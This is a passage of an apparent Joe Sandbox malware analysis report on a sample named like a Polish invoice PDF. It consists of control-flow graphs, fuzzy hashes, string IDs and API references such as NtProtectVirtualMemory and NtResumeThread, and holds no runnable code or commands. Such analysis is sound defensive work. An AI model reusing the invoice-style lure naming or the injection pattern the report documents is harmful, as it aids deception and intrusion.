65c6ee5-65c6eeb 1765->1794 1766->1768 1767->1764 1803 65c703e 1768->1803 1804 65c7045-65c704d 1768->1804 1769->1768 1770->1749 1805 65c6d19-65c6d21 1770->1805 1772->1760 1795 65c6efb 1773->1795 1796 65c6f00-65c6f08 1773->1796 1774->1768 1775->1749 1790 65c6e16-65c6e1e 1775->1790 1776->1749 1777->1761 1788 65c6dbd-65c6dc5 1777->1788 1778->1749 1793 65c6e9e-65c6ea6 1778->1793 1779->1777 1780->1749 1799 65c6f93-65c6f99 1780->1799 1781->1773 1782->1749 1784->1768 1785->1749 1786->1768 1787->1749 1806 65c6d45-65c6d4b 1787->1806 1788->1749 1790->1749 1791->1753 1791->1755 1791->1759 1791->1763 1791->1767 1791->1773 1791->1778 1791->1780 1791->1787 1791->1792 1792->1748 1793->1749 1794->1749 1795->1796 1796->1785 1815 65c6f0e-65c6f16 1796->1815 1797->1748 1799->1749 1801->1802 1802->1749 1803->1753 1803->1763 1803->1767 1803->1773 1803->1778 1803->1787 1803->1804 1804->1749 1805->1749 1806->1749 1807->1749 1809 65c6da1-65c6da9 1807->1809 1808->1807 1809->1749 1815->1748
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !$#$xJ
                                                                                      • API String ID: 0-636449615
                                                                                      • Opcode ID: 89060c49cb815a369d653d8af69c538f705e46e3e84d09aaf2020a4551198b8a
                                                                                      • Instruction ID: 2440585076b3842afdc833e2c315cda85eae645d99ca043c9a3338da59cf4658
                                                                                      • Opcode Fuzzy Hash: 89060c49cb815a369d653d8af69c538f705e46e3e84d09aaf2020a4551198b8a
                                                                                      • Instruction Fuzzy Hash: 76C1DE70D05208CFEB50CFE9D444BEDBBB2FB8A324F10942AD819BB245D7B59A458F94
                                                                                      Function 065C6C41 Relevance: 4.0, Strings: 3, Instructions: 287COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1665 65c6c41-65c6c4d 1666 65c6c9e-65c6cb1 1665->1666 1667 65c6c4f-65c6c81 1665->1667 1670 65c6cb3-65c6cb6 1666->1670 1675 65c6c88-65c6c9c 1667->1675 1676 65c6c83 1667->1676 1671 65c6cb9-65c6cbf 1670->1671 1673 65c6cc8-65c6cc9 1671->1673 1674 65c6cc1 1671->1674 1707 65c6eab-65c6eba 1673->1707 1674->1673 1677 65c6f9e-65c6fbf call 65c1430 1674->1677 1678 65c6f1b-65c6f1f 1674->1678 1679 65c7015-65c7022 1674->1679 1680 65c6d50-65c6d62 1674->1680 1681 65c7012-65c7013 1674->1681 1682 65c7052-65c7061 1674->1682 1683 65c6e53-65c6e59 1674->1683 1684 65c6cce-65c6cda 1674->1684 1685 65c6dca-65c6deb call 65c1430 1674->1685 1686 65c6fca-65c6fd4 call 65c72e1 1674->1686 1687 65c6fc4-65c6fc5 1674->1687 1688 65c7000-65c700d 1674->1688 1689 65c6f3e-65c6f5f call 65c1430 1674->1689 1690 65c6ebf-65c6edf 1674->1690 1691 65c6f38-65c6f39 1674->1691 1692 65c6ffa-65c6ffb 1674->1692 1693 65c7036-65c703c 1674->1693 1694 65c6ff7-65c6ff8 1674->1694 1695 65c6cf7-65c6d17 1674->1695 1696 65c7030-65c7031 1674->1696 1697 65c6df0-65c6df1 1674->1697 1698 65c6ef0-65c6ef9 1674->1698 1699 65c6f32-65c6f33 1674->1699 1700 65c6df3-65c6e10 1674->1700 1701 65c6e2c-65c6e4e 1674->1701 1702 65c6dae-65c6db7 1674->1702 1703 65c6e6f-65c6e98 1674->1703 1704 65c6e29-65c6e2a 1674->1704 1705 65c6f6a-65c6f8d 1674->1705 1706 65c702a-65c702b 1674->1706 1674->1707 1708 65c6f64-65c6f65 1674->1708 1709 65c7027-65c7028 1674->1709 1710 65c6fe7-65c6ff2 1674->1710 1711 65c6e23-65c6e24 1674->1711 1712 65c6d23-65c6d3f 1674->1712 1675->1666 1676->1675 1677->1670 1678->1682 1722 65c6f25-65c6f2d 1678->1722 1679->1671 1732 65c6d69-65c6d9b 1680->1732 1733 65c6d64 1680->1733 1681->1693 1682->1670 1716 65c6e5b 1683->1716 1717 65c6e62-65c6e6a 1683->1717 1726 65c6cdc 1684->1726 1727 65c6ce1-65c6cf5 1684->1727 1685->1671 1738 65c6fda-65c6fe6 1686->1738 1688->1671 1689->1671 1690->1671 1719 65c6ee5-65c6eeb 1690->1719 1691->1693 1692->1689 1728 65c703e 1693->1728 1729 65c7045-65c704d 1693->1729 1694->1693 1695->1671 1730 65c6d19-65c6d21 1695->1730 1697->1685 1720 65c6efb 1698->1720 1721 65c6f00-65c6f08 1698->1721 1699->1693 1700->1671 1715 65c6e16-65c6e1e 1700->1715 1701->1671 1702->1686 1713 65c6dbd-65c6dc5 1702->1713 1703->1671 1718 65c6e9e-65c6ea6 1703->1718 1704->1702 1705->1671 1724 65c6f93-65c6f99 1705->1724 1706->1698 1707->1671 1709->1693 1710->1671 1711->1693 1712->1671 1731 65c6d45-65c6d4b 1712->1731 1713->1671 1715->1671 1716->1678 1716->1680 1716->1684 1716->1688 1716->1692 1716->1698 1716->1703 1716->1705 1716->1712 1716->1717 1717->1670 1718->1671 1719->1671 1720->1721 1721->1710 1740 65c6f0e-65c6f16 1721->1740 1722->1670 1724->1671 1726->1727 1727->1671 1728->1678 1728->1688 1728->1692 1728->1698 1728->1703 1728->1712 1728->1729 1729->1671 1730->1671 1731->1671 1732->1671 1734 65c6da1-65c6da9 1732->1734 1733->1732 1734->1671 1740->1670
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !$#$xJ
                                                                                      • API String ID: 0-636449615
                                                                                      • Opcode ID: 2af3e9d0e58e8ffde29f303802afca72be0a337233e23a98e361189a1a4ce693
                                                                                      • Instruction ID: 78c9e7c08648f74a3024dc92ca1b5560e82644c4666d62418c91d66e6eb6d707
                                                                                      • Opcode Fuzzy Hash: 2af3e9d0e58e8ffde29f303802afca72be0a337233e23a98e361189a1a4ce693
                                                                                      • Instruction Fuzzy Hash: BEC1E070D05208CFEB50CFE9D444AEDBBB2FB8A324F10942AD819BB241D7B59A45CF94
                                                                                      Function 068E12E8 Relevance: 3.9, Strings: 3, Instructions: 170COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1920 68e12e8-68e1319 1922 68e131b 1920->1922 1923 68e1320-68e1403 call 68e1e48 1920->1923 1922->1923 1931 68e1405-68e1410 1923->1931 1932 68e1412 1923->1932 1933 68e141c-68e1537 1931->1933 1932->1933 1944 68e1549-68e1574 1933->1944 1945 68e1539-68e153f 1933->1945 1946 68e1d28-68e1d44 1944->1946 1945->1944 1947 68e1d4a-68e1d65 1946->1947 1948 68e1579-68e16dc 1946->1948 1958 68e16ee-68e1824 1948->1958 1959 68e16de-68e16e4 1948->1959 2012 68e182a call 65c2349 1958->2012 2013 68e182a call 65c2301 1958->2013 1959->1958 1968 68e182f-68e186b 1969 68e186d-68e1871 1968->1969 1970 68e18d0-68e18da 1968->1970 1971 68e1879-68e18cb 1969->1971 1972 68e1873-68e1874 1969->1972 1973 68e1b01-68e1b20 1970->1973 1974 68e1ba6-68e1c11 1971->1974 1972->1974 1975 68e18df-68e1a25 1973->1975 1976 68e1b26-68e1b50 1973->1976 1992 68e1c23-68e1c6e 1974->1992 1993 68e1c13-68e1c19 1974->1993 2004 68e1afa-68e1afb 1975->2004 2005 68e1a2b-68e1af7 1975->2005 1982 68e1b52-68e1ba0 1976->1982 1983 68e1ba3-68e1ba4 1976->1983 1982->1983 1983->1974 1995 68e1d0d-68e1d25 1992->1995 1996 68e1c74-68e1d0c 1992->1996 1993->1992 1995->1946 1996->1995 2004->1973 2005->2004 2012->1968 2013->1968
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fxq$h$xJ
                                                                                      • API String ID: 0-3382936468
                                                                                      • Opcode ID: f6cf3bde1879553af74a80273903c56175420c48633e5aad22a502ed27ad1f52
                                                                                      • Instruction ID: 54fc3fc00faf88f272cbea97ba90f0183e39a93368693b8e2bd3456647b84de0
                                                                                      • Opcode Fuzzy Hash: f6cf3bde1879553af74a80273903c56175420c48633e5aad22a502ed27ad1f52
                                                                                      • Instruction Fuzzy Hash: 4F711575E012288FDB64DF69D850BD9FBB2FF89300F1081AAD459A7254DB309E85CF60
                                                                                      Function 0650F498 Relevance: 3.8, Strings: 3, Instructions: 91COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2047 650f498-650f4c0 2048 650f4c2 2047->2048 2049 650f4c7-650f517 2047->2049 2048->2049 2052 650f51a-650f520 2049->2052 2053 650f522 2052->2053 2054 650f529-650f52a 2052->2054 2053->2054 2055 650f669-650f68a 2053->2055 2056 650f6eb-650fb06 2053->2056 2054->2056 2060 650f693-650f6da 2055->2060 2056->2052 2058 650fb0c-650fb14 2056->2058 2058->2052 2060->2052 2063 650f6e0-650f6e6 2060->2063 2063->2052
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$TJxq$xJ
                                                                                      • API String ID: 0-1296800256
                                                                                      • Opcode ID: 6ee6a822e13596345df49012202bee37ab12ea5a25a9f93343b3ce4262df4149
                                                                                      • Instruction ID: b1ffd5aff2c6d5c9379749e5eedaa4bf4dbb37f2b3bd18f07852d96db354e52a
                                                                                      • Opcode Fuzzy Hash: 6ee6a822e13596345df49012202bee37ab12ea5a25a9f93343b3ce4262df4149
                                                                                      • Instruction Fuzzy Hash: C841F770D05218CFEB68CF6AD9007DEBBF3BB89300F14C1A9C818A7295DB3459458F50
                                                                                      Function 066A99E8 Relevance: 2.9, Strings: 2, Instructions: 373COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$xJ
                                                                                      • API String ID: 0-4165237231
                                                                                      • Opcode ID: 73057cd8d4a6a142db5b95b024791fcc4055696287cdd8385c898a79d4b47ed0
                                                                                      • Instruction ID: 3aa28c90aba18f9d5eb91bf28afa64efe40dcf403a9d7e116e784c0a757d9582
                                                                                      • Opcode Fuzzy Hash: 73057cd8d4a6a142db5b95b024791fcc4055696287cdd8385c898a79d4b47ed0
                                                                                      • Instruction Fuzzy Hash: 37F1F574E15258CFDBA0DFA8D884BA9B7F2FB8A304F2081AAD909A7345D7705D91CF50
                                                                                      Function 0676F563 Relevance: 2.8, Strings: 2, Instructions: 315COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHsq$xJ
                                                                                      • API String ID: 0-2182200417
                                                                                      • Opcode ID: 1fd272d9759ca130830b99ecaed11f19af2013b45ab5e273ca91f96e1abd498e
                                                                                      • Instruction ID: c87ccc9cc65fd447d62618aede5299636438506e6a50c4c8387376b41afd729b
                                                                                      • Opcode Fuzzy Hash: 1fd272d9759ca130830b99ecaed11f19af2013b45ab5e273ca91f96e1abd498e
                                                                                      • Instruction Fuzzy Hash: D9E10674E05218CFEB94DFAAE844BADBBF2FB49304F1080A9E809A7355C7785985CF51
                                                                                      Function 0676F5B8 Relevance: 2.8, Strings: 2, Instructions: 313COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHsq$xJ
                                                                                      • API String ID: 0-2182200417
                                                                                      • Opcode ID: d89871b75edbcbfa9d2e7bccb6047cec17c2c3b5d6553959b0fd860770f541e7
                                                                                      • Instruction ID: 8ee74a8931864a02ebc3e3b2128ef24fd0a5ac4dca2947e553c0c2324bea3869
                                                                                      • Opcode Fuzzy Hash: d89871b75edbcbfa9d2e7bccb6047cec17c2c3b5d6553959b0fd860770f541e7
                                                                                      • Instruction Fuzzy Hash: 3CD12874E05218CFEB94DF6AE844BADBBF2FB49304F1090A9E809A7355CB785985CF41
                                                                                      Function 0676F5A7 Relevance: 2.8, Strings: 2, Instructions: 309COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHsq$xJ
                                                                                      • API String ID: 0-2182200417
                                                                                      • Opcode ID: c9b04379778ae6a4f475fff83194d61c2af345494dea5a3d1cf8b3928077964f
                                                                                      • Instruction ID: 0f95dd50f0afa12ccaf207438fc8ca7573a6b907d463f0ea225aecf18cb5e973
                                                                                      • Opcode Fuzzy Hash: c9b04379778ae6a4f475fff83194d61c2af345494dea5a3d1cf8b3928077964f
                                                                                      • Instruction Fuzzy Hash: 92D12774E05218CFEB94DF6AE844BADBBF2FB49304F1080A9E809A7355CB785985CF51
                                                                                      Function 066A7328 Relevance: 2.7, Strings: 2, Instructions: 241COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$xJ
                                                                                      • API String ID: 0-4165237231
                                                                                      • Opcode ID: ddfbe7ba5022165e159ff99af75b031c518e4bf071e84bb4407ff01a602e3fdc
                                                                                      • Instruction ID: 2476be91941a1d654a5ee6d4e0101b775127e00abd7a9964424447109c9814e0
                                                                                      • Opcode Fuzzy Hash: ddfbe7ba5022165e159ff99af75b031c518e4bf071e84bb4407ff01a602e3fdc
                                                                                      • Instruction Fuzzy Hash: 8AA1E074E05218CFEB94DFA9D884BADBBB2FB89300F209069D809A7355DB305D92CF50
                                                                                      Function 066A731A Relevance: 2.7, Strings: 2, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tesq$xJ
                                                                                      • API String ID: 0-4165237231
                                                                                      • Opcode ID: 0319171f7162f806a84247ae5594af03f6b11c5904a79851ae3cf87ab6b0779c
                                                                                      • Instruction ID: af7d1bf34ae69220810b3ea91d95c2e7619becb69d4d2c7d50c8f45da547af67
                                                                                      • Opcode Fuzzy Hash: 0319171f7162f806a84247ae5594af03f6b11c5904a79851ae3cf87ab6b0779c
                                                                                      • Instruction Fuzzy Hash: 73A1E174E05218CFDB94DFA9D984B9DBBB2FB89300F208069D809A7355DB305D96CF50
                                                                                      Function 06499AB3 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220839867.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6490000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 3eb8c4104e6c736d0f7633c677ae3cf7fad1e99edb87dcc0626e4a0f59426856
                                                                                      • Instruction ID: b910b2dfd67c5b003eed4f3e78ffea01aff7e1e944a325645448455f32d18589
                                                                                      • Opcode Fuzzy Hash: 3eb8c4104e6c736d0f7633c677ae3cf7fad1e99edb87dcc0626e4a0f59426856
                                                                                      • Instruction Fuzzy Hash: C252B6B4A046288FCB64DF28D994B9ABBB2FB49301F1091D9D54DA7355DB30AEC1CF60
                                                                                      Function 068E4A48 Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 068E4AD9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2706961497-0
                                                                                      • Opcode ID: 425e943ff377ad3193aefde3234c23d02ea08f8fd03ed0c62d141775b31387bb
                                                                                      • Instruction ID: 5880c4d72c3a7bca1d54ede7232fee9efecc44030e618c7b65ca608102a35c09
                                                                                      • Opcode Fuzzy Hash: 425e943ff377ad3193aefde3234c23d02ea08f8fd03ed0c62d141775b31387bb
                                                                                      • Instruction Fuzzy Hash: 2C21F2B5D002499FCB10DFAAD980ADEFBF5FF48320F20842AE519A7350C7759944CBA0
                                                                                      Function 068E4A50 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 068E4AD9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2706961497-0
                                                                                      • Opcode ID: 4b38acc1cb535eec375ce34c43e5641bde72e250891d9c2237508070e44004de
                                                                                      • Instruction ID: 0a0fbba25c071f29a9d6344c11690a1e8336f3b55dd8027c33446f156957d949
                                                                                      • Opcode Fuzzy Hash: 4b38acc1cb535eec375ce34c43e5641bde72e250891d9c2237508070e44004de
                                                                                      • Instruction Fuzzy Hash: A02100B1D003499FCB10DFAAD980ADEFBF5FF48320F20842AE519A7250C775A900CBA0
                                                                                      Function 068E80E8 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtResumeThread.NTDLL(?,?), ref: 068E8156
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: e48839dc4067146300ba0e346de93dab2296ae9d1f958fea55cc431aa82109ff
                                                                                      • Instruction ID: 9c28c3579511d804cc2fa9637a266582ac5f9c0c02c76b0e652de63a840b51c4
                                                                                      • Opcode Fuzzy Hash: e48839dc4067146300ba0e346de93dab2296ae9d1f958fea55cc431aa82109ff
                                                                                      • Instruction Fuzzy Hash: E611E7B1D002498EDB10DFAAC485A9FFBF5EF59320F14842AD519A7240CB756944CFA1
                                                                                      Function 068E80E6 Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtResumeThread.NTDLL(?,?), ref: 068E8156
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: d049114c1da183ac04fc1eff9710006a3800310d44e65d35a6ce5556a1dbff91
                                                                                      • Instruction ID: c5ce1b5283a14504fa348a0946c76b1fd5418a62274bbea135e68054c1c116b5
                                                                                      • Opcode Fuzzy Hash: d049114c1da183ac04fc1eff9710006a3800310d44e65d35a6ce5556a1dbff91
                                                                                      • Instruction Fuzzy Hash: 2D1126B1D002098EDB10DFAAC5857AEFBF4EF59320F14842AD529B7340CB789944CFA1
                                                                                      Function 06500498 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Dzq
                                                                                      • API String ID: 0-4123679374
                                                                                      • Opcode ID: 3637ea7590587d3748f370f29f426e38967dda50f95899728a7e60ea8529dd42
                                                                                      • Instruction ID: b250d67ba90d6622414169814480354069f0fdbd7012271bfc674a40c907ea75
                                                                                      • Opcode Fuzzy Hash: 3637ea7590587d3748f370f29f426e38967dda50f95899728a7e60ea8529dd42
                                                                                      • Instruction Fuzzy Hash: 3FD19174E01218CFDB54DFA9D994B9DBBB2BF89300F1081A9D409AB3A5DB35AD81CF50
                                                                                      Function 068E5938 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 31f0d88166d5e37c879f6d85ab176efafe771359606a193bcd14a1696f71848a
                                                                                      • Instruction ID: 92838dd6bfbce584364d3112051244e4593309a470c6729c84c693a8c3f17a41
                                                                                      • Opcode Fuzzy Hash: 31f0d88166d5e37c879f6d85ab176efafe771359606a193bcd14a1696f71848a
                                                                                      • Instruction Fuzzy Hash: CAB115B0E0121CCFEB54DFA5D845BEDBBF1BB4A308F0080AAD519AB250DB755A85CF61
                                                                                      Function 06500489 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Dzq
                                                                                      • API String ID: 0-4123679374
                                                                                      • Opcode ID: 7be477ab34e6837a01ff1831cac8e958b5ddbc820fa823c4b03af81c26114741
                                                                                      • Instruction ID: 8724bc4f59aca36887a3db2e58090368458e0d3322785677dc108fa1a6970bc3
                                                                                      • Opcode Fuzzy Hash: 7be477ab34e6837a01ff1831cac8e958b5ddbc820fa823c4b03af81c26114741
                                                                                      • Instruction Fuzzy Hash: 64A1A174E01218CFDB58DF69D994B9DBBB2BF89300F1081A9D409AB3A5DB70AD85CF50
                                                                                      Function 065C1DA8 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 7d365e88fa29e80e2472ee43c25314d4aef222dc7d5ce78254436473054016b3
                                                                                      • Instruction ID: 7a86d6cb3496e6309523133e8057e8bd641a7b759ceb584c81d6ff7814df2a12
                                                                                      • Opcode Fuzzy Hash: 7d365e88fa29e80e2472ee43c25314d4aef222dc7d5ce78254436473054016b3
                                                                                      • Instruction Fuzzy Hash: 75611874E042088FDB94DFA9D454AEDBBF6FB89310F20802AD915AB385DB319D51CF50
                                                                                      Function 069BFA60 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: f403a0ca1278dfa433638f01b556a9a440dccde3286abda8d6867642804ee32b
                                                                                      • Instruction ID: 06fd121386e75e40d4203037871e06bc22fcd9269843707ccab3f7e4c684d604
                                                                                      • Opcode Fuzzy Hash: f403a0ca1278dfa433638f01b556a9a440dccde3286abda8d6867642804ee32b
                                                                                      • Instruction Fuzzy Hash: 6C512674E0411A8FDB48CFA9D9406EEBBF2FB89310F10E529D415A7744D7349982CFA0
                                                                                      Function 065C21E5 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: ec11f3ca44bd1ab173938354db9d82f4c383f33be092f444ae6eef714d21c0d8
                                                                                      • Instruction ID: f5957c86b0ad0ca0db3a84e3fe8bc5623535daf076e200efa7b01132a6ca2aae
